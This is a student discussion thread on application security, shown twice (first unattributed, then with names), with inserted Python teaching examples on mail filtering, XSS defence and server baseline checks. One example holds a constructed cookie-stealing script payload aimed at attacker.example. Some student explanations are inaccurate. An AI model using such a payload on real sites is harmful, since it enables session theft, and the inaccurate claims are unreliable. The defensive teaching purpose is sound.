Application security is the discipline of processes, tools, and practices designed to protect applications from threats throughout the application lifecycle. Cybercriminals are organized and very professional. Their goal is to find and exploit vulnerabilities and incorporate applications to steal data, intellectual property, and sensitive information.
Most successful attacks are aimed at exploitable vulnerabilities in the application layer, which shows that corporate IT departments need to be more vigilant about application security. The number and complexity of applications continue to grow, making the problem even more complicated. Ten years ago, the software security challenge was to protect desktop applications and static websites, which were fairly harmless and easy to scope and protect. Now, considering outsourced development, the number of legacy applications, and internal development using third-party, open-source, and commercial off-the-shelf software components, the software supply chain has become more complex.
Application security solutions must test whether there are potential vulnerabilities that can be exploited in Web applications, be able to analyze code, and help manage security and development management processes by coordinating work and facilitating collaboration between various stakeholders. The solution must also provide application security testing that is easy to use and deploy.
Hi Zibai, applications can be different from operating systems in terms of security. There are many applications. For operating systems, there are only a handful of vendors that provide them, but there are many application software companies that provide services and release their own patch updates.
The mechanics of vulnerabilities, exploits, patches, and workarounds are not fundamentally different for operating systems and applications. The main difference is the small number of operating systems that most firms support versus the large number of applications they typically use. For operating systems, most enterprises only have to deal with a handful of vendors about vulnerabilities, patches, and workarounds. In terms of applications, companies might use many different applications from many different companies, which might have many different types of vulnerabilities, the lion’s share of all vulnerabilities. Just finding information about vulnerabilities and fixes can be a maddening chore because each vendor releases information about its products’ vulnerabilities and fixes in its own way. Although various vulnerability tracking services help (especially BugTraq at SecurityFocus.com), server administrators have to visit their application vendors’ websites frequently. After the firm finds patches, it must download and install them. Adding to the confusion, each vendor has different mechanisms for downloading and installing patches.
One key point I learned from Chapter 8 was application minimization on the host to mitigate network risk. Installed applications are potential points of attack and consume computer resources. Therefore, services that are not necessary should be disabled. Other controls that can help protect your application include:
• Create secure configurations: create a security configuration based on a baseline. For example, delete the default password.
• Install application patches and updates: ensure that all application patches are installed for new vulnerabilities and new versions of software.
• Minimize application permissions: only necessary programs should run with root privileges. Other programs should run with minimal privileges.
• Add application-level authentication, authorization, and auditing: appropriate access and authentication methods should be used.
The chapter talks about buffer overflow attacks, which are the most widespread vulnerability in application programs. A buffer is basically memory storage that temporarily holds data while it is being transferred from one location to another. A buffer overflow is when there is more data in a buffer than it can handle, causing data to overflow into adjacent memory space. This vulnerability can crash a system. Attackers exploit buffer overflow issues by overwriting the memory of an application. This changes the execution path of the application, which damages files. One of the ways to prevent buffer overflow vulnerabilities in applications is to keep them up to date with the latest security patches. Hackers take advantage of security vulnerabilities as soon as they are made public, so it’s always better to deploy security patches as soon as they become available.
Priyanka,
Thank you very much for the extra info on Buffer Overflows!
It has been a while since I learned about it. I forget which class at Drexel.
I am going to revisit all of this. Now would be a great time if I had the time I thought I was going to have by working from home. I actually feel like I have less time!
Hopefully, we start to head back to normalcy soon with low death tolls. It’s crazy!
Stay safe!
I love the part about software development and the process of moving software through three different server environments: development server, test server, and production server. The idea is that developers can access the code on the development server, and that’s all. They only submit the code to that environment. Then the code is moved to the test environment, and developers no longer have the right to access it. Testers can access it and complete their testing and quality assurance processes. The code then enters the production environment. In production, developers and testers do not have access rights. Using this method gives very strong control over development management. Untested or unsafe code cannot simply enter the production environment. The question is: if one day the production environment crumbles, how many companies have such a structure, where they first repair the code in the development environment, then submit it to the test environment, and then submit it to the production environment? To get back online quickly, some companies may ask their programmers to supervise and solve the problem as soon as possible. This is something we must avoid.
Hi Haozhe,
Thanks for sharing. As auditors, we will need to look at the organization from a macro perspective from the beginning. Understanding how their physical environment directly affects their virtual environment is key. Then, by securing the physical devices, we add another layer to their virtual information assets before we even open any of them. In turn, I agree that uploading the latest applications to mitigate security vulnerabilities is an important step toward fully protecting information assets.
One essential Internet application I noticed is e-mail, and e-mail filtering is the most common way to counter dangerous or inappropriate content. One type of e-mail that gets filtered carries harmful attached content, which may contain viruses, worms, and other malicious code; another usual type is spam, which most users are deluged by, and spam accounts for 60 to 90 percent of all Internet mail traffic on any given day. E-mail filtering can involve human intervention, but most often refers to the automatic processing of messages at an SMTP server, possibly applying anti-spam techniques. Filtering can be applied to incoming e-mails as well as to outgoing ones. Traditionally, e-mail malware and spam filtering was implemented on the client’s PC, but users often turn it off, and that also affects keeping the filtering up to date. Because of that, most companies now use filtering at the corporate e-mail server as the primary line of defense for e-mail. And due to the labor burden of e-mail security, some companies have switched to using e-mail managed service providers, which is cheaper and more professional.
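The server-side filtering the post describes, as an added example that is not part of the original thread or the textbook: a minimal gateway decision for one message delivered over SMTP, using Python's bundled email package. The blocked-suffix list, the spam phrases, the threshold and the three sample messages are all constructed here for the demonstration; a real gateway would use vendor signature feeds and reputation data instead of a phrase list.

```python
"""Server-side mail filter sketch.  Added example for this thread, not code
from the textbook or any vendor product.  The rules, thresholds and the three
sample messages below are all constructed for the demonstration."""
import email
import re
from email import policy
from email.message import EmailMessage

# Attachment suffixes a corporate gateway typically quarantines on sight (assumed list).
BLOCKED_SUFFIXES = {".exe", ".scr", ".js", ".vbs", ".hta", ".bat", ".cmd", ".ps1"}
# Crude spam markers; each hit adds one point, and SPAM_THRESHOLD points tags the mail.
SPAM_PHRASES = ("act now", "verify your account", "wire transfer", "click here")
SPAM_THRESHOLD = 2


def parse(raw):
    """Parse an RFC 5322 message as it arrives over SMTP."""
    return email.message_from_string(raw, policy=policy.default)


def blocked_attachments(msg):
    """Return attachment filenames whose suffixes include a blocked type.

    Every suffix is checked, so a double extension like 'payslip.pdf.exe'
    is caught even though '.pdf' is what a user notices first.
    """
    hits = []
    for part in msg.walk():
        if not part.is_attachment():
            continue
        name = (part.get_filename() or "").lower()
        suffixes = re.findall(r"\.[a-z0-9]+", name)
        if any(s in BLOCKED_SUFFIXES for s in suffixes):
            hits.append(name)
    return hits


def spam_score(msg):
    """Score subject + text/plain body against the phrase list and a header check."""
    body = msg.get_body(preferencelist=("plain",))
    text = ((msg["Subject"] or "") + " " + (body.get_content() if body else "")).lower()
    score = sum(1 for phrase in SPAM_PHRASES if phrase in text)
    # A Reply-To that differs from From is a classic phishing tell.
    if msg["Reply-To"] and str(msg["Reply-To"]) != str(msg["From"]):
        score += 1
    return score


def analyze(raw):
    """Gateway decision for one inbound message: quarantine, spam, or deliver."""
    msg = parse(raw)
    blocked = blocked_attachments(msg)
    score = spam_score(msg)
    if blocked:
        verdict = "quarantine"
    elif score >= SPAM_THRESHOLD:
        verdict = "spam"
    else:
        verdict = "deliver"
    return {"verdict": verdict, "blocked": blocked, "spam_score": score}


def _malware_sample():
    """Constructed message: a 'payslip' that is really an executable."""
    m = EmailMessage()
    m["From"] = "payroll@example.com"
    m["To"] = "staff@example.com"
    m["Subject"] = "Your payslip"
    m.set_content("Please open the attached payslip.")
    m.add_attachment(b"MZ\x90\x00", maintype="application",
                     subtype="octet-stream", filename="payslip.pdf.exe")
    return m.as_string()


SAMPLE_MALWARE = _malware_sample()
SAMPLE_SPAM = """\
From: promo@example.net
Reply-To: collector@example.org
To: staff@example.com
Subject: Verify your account today

Click here to verify your account and act now.
"""
SAMPLE_CLEAN = """\
From: alice@example.com
To: bob@example.com
Subject: Lunch

Noon tomorrow works for me.
"""

if __name__ == "__main__":
    for label, raw in (("malware", SAMPLE_MALWARE), ("spam", SAMPLE_SPAM), ("clean", SAMPLE_CLEAN)):
        print(label, analyze(raw))
```

The attachment check runs before the spam score on purpose: a message with an executable payload is quarantined regardless of how innocuous its text looks, which is the failure mode the post calls out (a disguised mail that "looks legitimate").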
I chose the same section as I felt it has the most correlation to my position at work. Our system does a good job of filtering most phishing and malicious emails; however, every once in a while one will come through. Most of the time when it gets through it is very obvious; however, there have been times when they are disguised, and it is something as simple as opening that email that can begin the domino effect of a security breakdown in the system.
One key takeaway from this chapter was the information about email servers being leveraged for attacks more often than they had been in the past. The ability to add attachments to emails makes them a very interesting attack surface for exploitation. Recently there was a very large vulnerability related to Microsoft Exchange servers. Organizations could have had their emails monitored or ransomware passed through their company. The email server is extremely important and must be protected properly in order to prevent huge losses.
Hi Jonathan,
Thank you for such great insight into the importance of security for email servers. I totally agree with you! The ability of attackers to add attachments and links makes email one of the most popular mediums of attack. I agree that it is critical for organizations to have email filters and monitoring systems implemented to protect their information assets. I think this is also critical for instant messenger software and tools like Microsoft Teams and Slack, as they gain more and more popularity now compared to email. These tools are now instant means of communication among employees. They also allow users to share much larger files than email servers, which can pose a greater risk.
The key takeaways from this chapter are the different types of attacks that can occur when an application is insecure. These attacks include buffer overflow, login screen bypass, cross-site scripting (XSS), and SQL injection. Buffer overflow attacks involve sending code that is purposely too much information for the RAM allocated to the application and, depending on the application, can crash the server or allow any code to be executed. Login screen bypasses can occur if the developer doesn’t patch URLs past a login screen, which allows any user to access the site. XSS attacks are when attackers use legitimate URLs as a base but make them too long for users to see the end in an email attachment, and the end of the URL executes a script for the attacker to perform a myriad of tasks. Lastly are SQL injection attacks, which occur when SQL code is placed in a string query that should only be accepting string inputs.
The execution of arbitrary code in a buffer overflow attack can pose severe dangers to the system and the network at large. An example would be an attacker managing to initiate a command-and-control attack this way, then using the nodes on the network as zombies to conduct a DDoS attack, either on other networked systems in the organization or external to the organization. The possibilities for attacks and vulnerabilities can seem endless in such situations.
Application security is a lot more difficult than hardening the operating system because clients and servers may run multiple applications. Each application may be as difficult to harden as an operating system. Hacking into an application can be as simple as running a single command, and it is currently the dominant hacking vector today.
To harden an application, there is a process the organization should go through to understand the environment that needs protection. The first step would be to understand the server’s role and threat environment; in extremely dangerous environments, remote administration may have to be disabled as well. The firm should also minimize main applications: the fewer applications the host runs, the fewer opportunities there are to be hacked. Having application patches and updates implemented is also crucial in protecting the application against KNOWN and exposed threats. There are many ways of securing the application, including encrypting the system, adding application-level authentication, enabling logging, and giving the application the least privilege needed.
I agree that with hardening, certain protocols such as RDP should be disabled if they have limited or no use to the organization. Unfortunately, many organizations rely on certain ports to stay open, and those ports will always have a chance to be exploited.
The section that stood out to me was email security. Email is such an integral part of individuals’ lives but also of organizations. It provides a way to move information within the network, but a lot of the time the information needs to be secure, as it can be sensitive. The issue is that attackers know this, and email is one of the harder avenues to secure; therefore it is more exploited than other areas. Companies have software in place to assist with filtering emails, thus keeping junk from getting to an employee’s eyes with the goal of mitigating phishing attacks. The problem with this is that the system often over-filters, and information or emails we do need end up getting caught in that net. The attack usually is code within attachments and HTML bodies, thus gaining access to the system when clicked, and the user may not even know if the email looks legitimate.
Hi, Austin. I like how you point out how email affects our daily work. Email is an essential communication tool to connect with people. Our emails are linked to many different websites, including social media, e-commerce websites, and governmental websites. If our email is involved in a cyber incident, we need to disable all accounts that are linked to the email.
PC users are a major target, attacked through the browser. Once the user is compromised through the data stored on the user’s PC, cybercriminals can use this user’s system to attack other systems to which the user has access credentials. Because Microsoft Windows has many built-in ActiveX controls, some malicious sites use ActiveX to install viruses or backdoors automatically. By using scripting languages, the attacker can modify and add file content, access login information, or execute an external executable file directly from the browser. Even though the Microsoft Edge browser does not support ActiveX and replaces Internet Explorer, Windows 10 still ships with Internet Explorer 11 built in for users to choose from.
Hi Cami,
I agree PCs are a large attack target; Microsoft should really figure out a way to remediate these outdated add-ons with common vulnerabilities like ActiveX. Another reason why PCs are so commonly attacked is how open-source the systems are. Compared to Apple’s closed system models, Windows vulnerabilities are more commonly disclosed in forums and exploited because of the visibility.
One takeaway from this chapter is the difference between WWW service and e-commerce service. The book refers to WWW service as the basic functionality of HTTP web servers that are responsible for retrieving static and dynamic web pages using the software installed on the server. The two main web servers are Microsoft’s IIS and the Linux Apache server. E-commerce service refers to the additional functionality a website uses for buying and selling products, integration with external and internal applications, handling shipping information, etc. Although organizations create their own custom software to support some e-commerce functionality, the process cannot be completed alone. For example, in a checkout process, the software needs to be integrated with multiple credit card providers so that each can be accepted as a payment type. To accept VISA, there needs to be integration with VISA’s backend systems to process a transaction.
Hi, Anthony, thank you for sharing your points; I agree with them. Also, WWW service and e-commerce security have lots of disadvantages: firstly, there is the cost of disruptions, and there is harm to reputation and market capitalization. Secondly, it will cause customer fraud. Thirdly, it will increase the exposure of sensitive private information.
I use SQL on a daily basis as a Business Analyst. I am constantly querying the database for things that my client may need, especially during data migration from a legacy system into the new implementation of financial software. As such, the section on SQL injection stood out to me. SQL injection attacks send modified queries to try to modify the database of an application. They can also execute commands on a server.
My key takeaway from this chapter was the attack methods using SQL injection.
– In-band injections, which extract data from the DB and make it public in a web browser.
– Out-of-band injections, which use malformed statements to extract data from sources like email instead of directly from the DB.
– Inferential injections, which extract metadata from the DB about the DB itself.
  – Error-based inference assumes the DB receives a query based on error messages.
  – Blind injection uses multiple statements that work together, causing a single error message to be generated for different types of errors. This could be a serious attack, as it could put the system in a loop of performing a trivial task a million times, for example.
Measures can be taken to protect a DB from a SQL injection attack by parameterizing and sanitizing queries, limiting the permissions required to run the web app, and using stored procedures.
The key point that I took away from this chapter is the WWW service and E-commerce service. We will use the term WWW service for the basic functionality of HTTP webservers, including the retrieval of static files (fixed webpages) and the creation of dynamic webpages (webpages created in response to a specific query) using software on the webserver. We will use the term e-commerce service to refer to the additional software needed for buying and selling, including online catalogs, shopping carts, checkout functions, connections to back-end databases within the firm, and links to outside organizations, such as banks.
WWW service and e-commerce security have lots of disadvantages: firstly, there is the cost of disruptions, and there is harm to reputation and market capitalization. Secondly, it will cause customer fraud. Thirdly, it will increase the exposure of sensitive private information.
Hi Zhen,
I think your point that WWW service has a lot of disadvantages is very interesting. The Web has become the main means for many people to find and browse information on the Internet. You can set up a web server on a Linux host, store your homepage on your own web server, and publish your homepage to the outside through it.
E-mail filtering is an important part of an organization. The SMTP and POP3 protocols are mainly used in the mail delivery process. The client uses SMTP when sending mail to the mail server, and POP3 when receiving mail from the mail server. From the perspective of the mail server, spam and emails with harmful content are all delivered to user mailboxes on the mail server through SMTP. Therefore, filtering external mail delivered to the local mail server through SMTP achieves the purpose of protecting local mail users from spam, reactionary mail, etc.
The basis of mail filtering is filtering rules. In order to achieve effective mail filtering, multi-level mail filtering rules need to be formulated. The filtering algorithm performed by the system according to the filtering rules should have a certain degree of intelligence.
One of the topics that I found interesting this week is SQL injection attacks. When database access is being implemented, the user may be prompted for certain information, such as a username, password, or account PIN code. This input is then tested with an SQL query. For instance, if you type your name, the string you type, $name, may be input into an SQL query to find your address. If input checking is not done, or is poorly done, an attacker may be able to use SQL injection to enter a string that includes both the user’s name and more SQL query.
I also found the different types of SQL injection attacks interesting. Whether it is an in-band attack that extracts data directly from the database or an out-of-band attack that uses improperly formed SQL statements to extract data through a different application, there are many methods of creating a SQL injection attack.
The section on web security really stood out. It seems that many times an attacker’s first entry point into a network is going to be through the Internet-facing web server. Attackers like to leverage scripting languages such as JavaScript or VBScript to inject code into a webpage. Malicious script attacks allow attackers to execute any command they choose on a victim’s computer, many times in the form of a command shell. Attackers also leverage website cookies, which are small text strings that the website owner can place on a client computer. If an attacker is able to get a user to visit a malicious website, through social engineering for example, cookies can be placed in the user’s browser. These cookies can then be harvested for login names and passwords.
Hi Anthony,
The most vulnerable point of entry for attackers is always an outward-facing system/application. Most organizations focus on protecting their web servers without knowing all the other systems and applications they may have that are accessible from the outside. Sometimes such applications can have components that are accessible to their business partners and vendors only. However, if those external entities are compromised, then they put the organization at risk as well.
Under application security, a key component of hardening applications is security baselines for application minimization. This enables security professionals to either reduce the number of applications or at least reduce the number of services that are not necessarily being used by applications. These two options greatly reduce the attack surface and hence work towards hardening the systems at large. Disabling superfluous apps and services is a basic step toward reducing the amount of logging and monitoring that must be done to secure the system.
Another concept is securing custom applications that are in use within the organization. The first and best way to start is by ensuring that all user input is validated or checked in some way before being forwarded within/between applications. This validation can prevent a wide range of known attacks such as SQL injections and even cross-site scripting attacks to some extent. Securing applications and all their components is a vital step in ensuring the system is well hardened.
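The script-injection and cookie-harvesting scenario from the web security post, together with the input validation the post just above recommends, as an added example that is not part of the original thread or the textbook. It is plain Python with the standard library: a comment rendered into a page with and without output encoding, a link attribute restricted to http(s), and a session cookie issued with the flags that keep script from reading it. The page fragment, cookie layout and attack strings are constructed for the demonstration.

```python
"""Input validation, output encoding and cookie hardening.  Added example for
this thread, not code from the textbook; the page fragment, cookie layout and
attack strings are constructed for the demonstration."""
import html
import re
from urllib.parse import urlsplit

USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")   # conservative allowlist (assumed policy)
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def validate_username(value):
    """Allowlist validation at the input boundary: reject anything outside the charset."""
    if not USERNAME_RE.fullmatch(value):
        raise ValueError("username contains characters outside the allowlist")
    return value


def render_comment_vulnerable(author, body):
    """Untrusted text spliced straight into the page: a stored XSS sink."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author, body):
    """Same page, but each untrusted value is HTML-encoded for the text context."""
    return (f'<div class="comment"><b>{html.escape(author)}</b>: '
            f'{html.escape(body)}</div>')


def safe_href(url):
    """Attribute context: only http(s) schemes survive, and the value is quote-escaped."""
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return html.escape(url, quote=True)


def render_link_safe(text, url):
    return f'<a href="{safe_href(url)}">{html.escape(text)}</a>'


def contains_script_tag(fragment):
    """Check used in this example to show whether a rendered fragment still has a live <script>."""
    return SCRIPT_TAG.search(fragment) is not None


def session_cookie_header(session_id):
    """HttpOnly keeps document.cookie from reading it; Secure keeps it off plain HTTP."""
    return (f"Set-Cookie: session={session_id}; "
            "HttpOnly; Secure; SameSite=Lax; Path=/")


# Constructed attack strings of the kind the post describes.
COOKIE_THIEF = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
JS_URL = "javascript:alert(document.cookie)"

if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", COOKIE_THIEF))
    print(render_comment_safe("mallory", COOKIE_THIEF))
    print(render_link_safe("profile", JS_URL))
    print(session_cookie_header("0123456789abcdef"))
```

Validation and encoding are separate layers: the username allowlist keeps garbage out of the database, but free-text fields like the comment body have to accept angle brackets, so they are made inert at output time, in the context they land in (text vs. attribute vs. URL). The cookie flags limit what a script that does slip through can harvest.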
I learned about the steps one can take to harden applications, including first knowing the server’s role and minimizing the number of applications running on the server so that only the services needed to run the application are on the server and all other extraneous services are disabled or uninstalled. After understanding the server’s role, steps like physical security, backup, hardening the OS, minimizing applications, defining subsidiary applications, and using baselines to guide security set-up on the server can be completed. The application should be configured to go beyond the default configuration by specifying the services and database accounts, hardware, and devices that it interacts with, rejecting all other network traffic, and changing the default passwords. The application should be kept up to date and patched, and the permissions of the application should be minimized to just what is needed to run it. The application should also own the authentication, authorization, and auditing at the application layer. Cryptography should be enabled for all communication with users. These are the steps taken to harden the application.
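The baseline-driven minimization that this post and the earlier hardening posts describe (know the server's role, run only the services that role needs, give each program the least privilege it needs), as an added example that is not part of the original thread or the textbook: a small compliance check in Python that compares what a host is actually listening on and running as root against a written baseline. The baseline, and the `ss -tlnp` and `ps -eo user,pid,comm` output it is checked against, are constructed here for a hypothetical web server that has drifted; on a real host you would feed it the live output of those two commands.

```python
"""Baseline check for a hardened server.  Added example for this thread, not
code from the textbook.  The baseline, and the `ss -tlnp` / `ps -eo user,pid,comm`
output it is checked against, are constructed for a hypothetical web server."""
import re

# Assumed baseline for a web-server role: which ports may listen and which
# program should own each, plus the only binaries allowed to run as root.
BASELINE = {
    "listeners": {22: "sshd", 443: "nginx"},
    "root_allowed": {"systemd", "sshd", "nginx", "cron"},
}

SS_LINE = re.compile(r':(\d+)\s+\S+\s+users:\(\("([^"]+)"')
PS_LINE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)$")


def parse_listeners(ss_output):
    """Map listening port -> process name from `ss -tlnp` style text."""
    listeners = {}
    for line in ss_output.splitlines():
        m = SS_LINE.search(line)
        if m:
            listeners[int(m.group(1))] = m.group(2)
    return listeners


def parse_root_processes(ps_output):
    """Set of command names running as root from `ps -eo user,pid,comm` text."""
    root = set()
    for line in ps_output.splitlines()[1:]:      # skip the header row
        m = PS_LINE.match(line.strip())
        if m and m.group(1) == "root":
            root.add(m.group(3))
    return root


def check_baseline(ss_output, ps_output, baseline=BASELINE):
    """Return findings as (kind, detail) tuples; an empty list means compliant."""
    findings = []
    for port, proc in sorted(parse_listeners(ss_output).items()):
        expected = baseline["listeners"].get(port)
        if expected is None:
            findings.append(("unexpected-listener", f"{proc} on {port}"))
        elif expected != proc:
            findings.append(("wrong-owner", f"{proc} on {port}, expected {expected}"))
    for proc in sorted(parse_root_processes(ps_output)):
        if proc not in baseline["root_allowed"]:
            findings.append(("root-not-allowed", proc))
    return findings


# Constructed sample output, as the two commands would print it on a host that
# drifted from the baseline: an FTP daemon and MySQL listening, and an app
# worker running as root.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22          0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      511          0.0.0.0:443         0.0.0.0:*     users:(("nginx",pid=1201,fd=6))
LISTEN 0      128          0.0.0.0:21          0.0.0.0:*     users:(("vsftpd",pid=1330,fd=4))
LISTEN 0      50           0.0.0.0:3306        0.0.0.0:*     users:(("mysqld",pid=1402,fd=21))
"""
SAMPLE_PS = """\
USER  PID  COMMAND
root  1    systemd
root  812  sshd
root  1201 nginx
www   1202 nginx
root  1330 vsftpd
mysql 1402 mysqld
root  1500 app-worker
"""

if __name__ == "__main__":
    for kind, detail in check_baseline(SAMPLE_SS, SAMPLE_PS):
        print(f"{kind}: {detail}")
```

Each finding maps to one of the hardening steps above: an unexpected listener is a service to disable or uninstall, a wrong owner is a configuration that has drifted from the baseline, and a root process that is not on the list is a candidate for running under a dedicated low-privilege account. Running the check on a schedule turns the one-time baseline into something that is actually enforced.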
Zibai Yang says
Application security is the discipline of processes, tools, and practices designed to protect applications from threats throughout the application lifecycle. Cybercriminals are organized and very professional. Their goal is to find and exploit vulnerabilities and incorporate applications to steal data, intellectual property, and sensitive information.
Most successful attacks are aimed at exploitable vulnerabilities in the application layer, which shows that corporate IT departments need to be more vigilant about application security. The number and complexity of applications continue to grow, making the problem even more complicated. Ten years ago, the software security challenge was to protect desktop applications and static websites, which were fairly harmless and easy to scope and protect. Now, considering outsourcing development, the number of legacy applications, and internal development using third-party, open-source, and commercial, off-the-shelf software components, the software supply chain has become more complex.
Application security solutions must test whether there are potential vulnerabilities that can be exploited in Web applications, be able to analyze code, and help manage security and development management processes by coordinating work and facilitating collaboration between various stakeholders. The solution must also provide application security testing that is easy to use and deploy.
Ting-Yen Huang says
Hi Zibai, application can be different from operating system in terms of security. There are many applications. For operating system, there are only a handful of vendors that provide operating system, but there are many application software company that provide service and make their patch update.
Ting-Yen Huang says
The mechanics of vulnerabilities, exploits, patches, and work-around are not fundamentally different for operating systems and applications. The main difference is the small number of operating systems that most firms support versus the large number of applications they typically use. For operating systems, most enterprise only have to deal with a handful of vendors about vulnerabilities, patches, and work arounds. In terms of application, companies might use many different applications from many different companies, which, might have many different types of vulnerabilities. The lion’s share of all vulnerabilities. Just finding information about vulnerabilities and fixes can be a maddening chore because each vendor releases information about its products’ vulnerabilities and fixes in its own way. Although various vulnerability tracking services help (especially BugTraq at SecurityFocus.com), server administrators have to visit their application vendors’ websites frequently. After the firm finds patches, it must download and install the patches. Adding to the confusion, each vendor has different mechanisms for downloading and installing patches.
Wenyao Ma says
One key point I learned from Chapter 8 was the application that minimizes the host operation to mitigate network risk. Installed applications are potential points of attack and consume computer resources. Therefore, services that are not necessary should be disabled. Other controls that can help protect your application include:
• Create secure configurations; Create a security configuration based on a baseline. For example, delete the default password.
• Install application patches and updates; Ensure that all application patches are installed for new vulnerabilities and new versions of software.
• Minimize applications for permits; Only necessary programs can be run with root privileges. Other programs can run at a minimum.
• Add application-level authentication, authorization, and auditing; Appropriate access and authentication methods should be used.
Priyanka Ranu says
The chapter talks about buffer overflow attacks which is the most widespread vulnerability in application programs. Buffer is basically a memory storage that temporary holds data while it is being transferred from one location to another. A buffer overflow is when there is more data in a buffer than it can handle causing data to overflow into adjacent memory space. This vulnerability can crash a system. Attackers exploit buffer overflow issues by overwriting the memory of an application. This changes the execution path of the application which damages files. One of the ways to prevent buffer overflow vulnerabilities in the applications is to keep them up to date with the latest security patches. Hackers take advantage of security vulnerabilities as soon as they are made public so it’s always a better to deploy security patches as soon as they become available.
Haozhe Lin says
Priyanka,
Thank you very much for the extra info on Buffer Overflows!
It has been a while since I learned about it. I forget which class at Drexel.
I am going to revisit all of this. Now would be a great time if I had the time I thought I was going to have by working from home. I actually feel like I have less time!
Hopefully, we start to head back to normalcy soon with low death tolls. It’s crazy!
Stay safe!
Haozhe Lin says
I love the part about software development and the process of moving software in three different server environments: development server, test server, and production server. The idea is that developers can access the code on the development server, that’s all. They only submit the code to the environment. Then the code is moved to the test environment, and developers no longer have the right to access it. Testers can access and complete their testing and quality assurance processes. The code then enters the production environment. In production, developers and testers do not have access rights. By using this method, it has very strong control over development management. Untested or unsafe code cannot simply enter the production environment. The question is: if one day the production environment crumbled, how many companies had such a structure: first, repair the code in the development environment, then submit it to the test environment, and then submit it to the production environment. To restore online quickly, some companies may ask their programmers to supervise and solve this problem as soon as possible. This is something we must avoid.
Wenyao Ma says
Hi Haozhe,
Thanks for your sharing. As auditors, we will need to look at the organization from a macro perspective from the beginning. Understanding how their physical environment directly affects their virtual environment is key. Then, by securing the physical devices, we add another layer to their virtual information assets before we even open any of them. In turn, I agree that uploading the latest applications to mitigate security vulnerabilities is an important step toward fully protecting information assets.
Xinyi Zheng says
One essential Internet application I noticed is E-mail, and email filtering is most common way to anti dangerous or inappropriate content. One type of e-mail which will be filtered is attached harmful content, it may contain viruses, worms, and other malicious code; and another usual type is spam, most users are deluged by that and spam accounts for 60 to 90 percent of all Internet mail traffic on any given day. Email filtering can apply to the intervention of human intelligence, but most often refers to the automatic processing of messages at an SMTP server, possibly applying anti-spam techniques. Filtering can be applied to incoming emails as well as to outgoing ones. Traditionally, the process of e-mail malware and spam filtering id implement on the client’s PCs, but users often turn it off and it will impact the updated of filtering. Based on that, most companies now use filtering at the corporate e-mail server as the primary line of defense for e-mail. And due to the labor burdens of e-mail security, some companies transform to using the e-mail managed service providers, which is cheaper and more professional.
Austin Mecca says
Xinyi,
I chose the same section as I felt it has the most correlation to me in my position at work. Our system does a good job of filtering most phishing and malicious emails, however every once in a while one will come through. Most of the time when it gets through it is very obvious, however there have been times where they are disguised and it is something as simple as opening that email that can begin the domino effect of a security breakdown in the system.
Jonathan Castelli says
One key takeaway from this chapter was the information about email servers being leveraged for attacks more often than they had been in the past. The ability to add attachments to emails makes them a very interesting attack surface for exploitation. Recently there was a very large vulnerability related to Microsoft Exchange servers. Organizations could have had their emails monitored or ransomware passed through their company. The email server is extremely important and must be protected properly in order to prevent huge losses.
Prince Patel says
Hi Jonathan,
Thank you for such a great insight into the importance of security for email servers. I totally agree with you! The ability of attackers to add attachments and links makes email one of the most popular mediums of attack. I agree that it is critical for organizations to have email filters and monitoring systems implemented to protect their information assets. I think this is also critical for instant messenger software and tools like Microsoft Teams and Slack, as they gain more and more popularity now compared to email. These tools are now instant means of communication among employees. They also allow users to share much larger files than email servers, which can pose a greater risk.
Krish Damany says
The key takeaways from this chapter are the different types of attacks that can occur when an application is insecure. These attacks include buffer overflow, login screen bypass, cross-site scripting (XSS), and SQL injection. Buffer overflow attacks involve sending code that is purposely too much information for the RAM allocated for the application, and depending on the application can crash the server or allow any code to be executed. Login screen bypasses can occur if the developer doesn’t patch URLs past a login screen, which allows any user to access the site. XSS attacks are when attackers use legitimate URLs as a base but make them too long for users to see the end in an email attachment, and the end of the URL executes a script for the attacker to perform a myriad of tasks. Lastly, SQL injection attacks occur by placing SQL code in a string query that should only be accepting string inputs.
Humbert Amiani says
Hi Krish,
The execution of arbitrary code in a buffer overflow attack can pose severe dangers to the system and the network at large. An example would be an attacker managing to initiate a control command attack this way, then using the nodes on the network as zombies to conduct a DDoS attack either on other networked systems in the organization or external to the organization. The possibilities for attacks and vulnerabilities can seem endless in such situations.
Mei X Wang says
Application security is a lot more difficult than hardening the operating system because the clients and servers may run on multiple applications. Each application may be as difficult to harden as an operating system. The ease of hacking into an application can be as simple as running a single command, and it is currently the dominant hacking vector today.
To harden an application, there is a process the organization should go through to understand the environment that needs protection. The first step would be to understand the server’s role and threat environment; in extremely dangerous environments, remote administration may have to be disabled as well. The firm should also minimize main applications: the fewer applications the host runs, the fewer opportunities there are to be hacked. Having application patches and updates implemented is also crucial in protecting the application against KNOWN and exposed threats. There are many ways of securing the application, including encrypting the system, adding application-level authentication, enabling logging, and giving the application the least privilege needed.
Krish Damany says
Hi Mei,
I agree that with hardening, certain protocols such as RDP should be disabled if they have limited or no use to the organization. Unfortunately, many organizations rely on certain ports to stay open, and those ports will always have a chance to be exploited.
Austin Mecca says
The section that stood out to me was the email security. Email is such an integral part of individuals’ lives but also of organizations. It provides a way to move information within the network, but a lot of the time the info needs to be secure, as it can be sensitive. The issue is that attackers know this, and email is one of the harder avenues to secure; therefore it is more exploited than other areas. Companies have software in place to assist with filtering emails, thus keeping junk from getting to an employee’s eyes with the goal of mitigating phishing attacks. The problem with this is that the system often over-filters, and information or emails we do need end up getting caught in that net. The attack usually is code within attachments and HTML bodies, thus gaining access to the system when clicked, and the user may not even know if the email looks legitimate.
Cami Chen says
Hi, Austin. I like how you point out how email affects our daily work. Email is an essential communication tool to connect with people. Our emails are linked to many different websites, including social media, e-commerce websites, and governmental websites. If our email is involved in a cyber incident, we need to disable all accounts that are linked to the email.
Cami Chen says
